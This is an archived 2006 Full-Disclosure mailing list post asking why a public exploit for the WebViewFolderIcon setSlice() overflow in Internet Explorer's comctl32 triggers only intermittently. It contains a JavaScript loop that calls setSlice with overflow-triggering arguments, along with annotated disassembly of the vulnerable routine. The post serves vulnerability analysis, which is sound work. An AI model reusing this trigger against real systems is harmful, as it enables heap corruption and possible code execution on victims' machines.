| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <de6cc1fe0611230206j724ef456nfa3cdbe45e86ae74@mail.gmail.com>
Date: Thu, 23 Nov 2006 18:06:22 +0800
From: ". Solo" <soloaway@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Regarding WebViewFolderIcon setSlice() Exploit
Hi, all
some question puzzled me.
the exploit http://www.milw0rm.com/exploits/2448
In assembly code, it allco 0 bytes first, and then we can tell It overflow
through the "rep movsd " in ".text:780AA731". In fact, It is required that
the edi must be set to the place we alloc of 0 byte, if we want to trigger
the vulnerability.
But most of time it can not be triggered.
I saw the exploit invoked the setSlice repeatly, yet sometimes it can be
triggered through the long "FOR" repeat. I can not find the reason why it
can be triggered if just repeat and repeat, what is it happan to make the
edi to the point of 0byte,
Thanks for your help
for ( i = 0 ; i < 128 ; i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
}catch(e){}
}
.text:780AA6F1 mov ecx, [ebx+10h] ; ecx =
00000002
.text:780AA6F4 add eax, ecx ; eax =
80000000
.text:780AA6F6 cdq ;
edx = FFFFFFFF
.text:780AA6F7 idiv ecx ; eax
= C000000 (edx = 00000000)
.text:780AA6F9 mov esi, eax ; esi =
C0000000
.text:780AA6FB mov eax, [ebx+0Ch] ; eax =
00000010 ([00eaeb34])
.text:780AA6FE imul esi, ecx
.text:780AA701 imul eax, esi
.text:780AA704 push eax ;
uBytes
.text:780AA705 push dword ptr [ebx+4] ; hMem
.text:780AA708 call comctl32__ReAlloc ; Alloc 0
Byte
.text:780AA70D test eax, eax ; eax is
the point to the place of "0Byte"
.text:780AA70F jz short loc_780AA73D
.text:780AA711 mov [ebx+4], eax
.text:780AA714 mov eax, [esp+0Ch+arg_4] ; eax = 7fffffff
.text:780AA718 mov [ebx+8], esi ; [ebx+8]
= 80000000
.text:780AA71B
.text:780AA71B loc_780AA71B: ; CODE XREF:
comctl32__DSA_SetItem+1D.j
.text:780AA71B mov [ebx], edi ; [ebx]
= edi = 7fffffff
.text:780AA71D
.text:780AA71D loc_780AA71D: ; CODE XREF:
comctl32__DSA_SetItem+15.j
.text:780AA71D mov ecx, [ebx+0Ch]
.text:780AA720 mov esi, [esp+0Ch+arg_8] ; esi = "DCBA",
arg_8
.text:780AA724 mov edi, ecx
.text:780AA726 imul edi, eax
.text:780AA729 add edi, [ebx+4]
.text:780AA72C mov eax, ecx
.text:780AA72E shr ecx, 2
.text:780AA731 rep movsd ;copy esi to
edi,but the edi is not always be the place we alloc 0byte.
.text:780AA733 mov ecx, eax
.text:780AA735 and ecx, 3
.text:780AA738 xor eax, eax
.text:780AA73A rep movsb
.text:780AA73C inc eax
.text:780AA73D
.text:780AA73D loc_780AA73D: ; CODE XREF:
comctl32__DSA_SetItem+3D.j
.text:780AA73D pop edi
.text:780AA73E pop esi
.text:780AA73F pop ebx
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists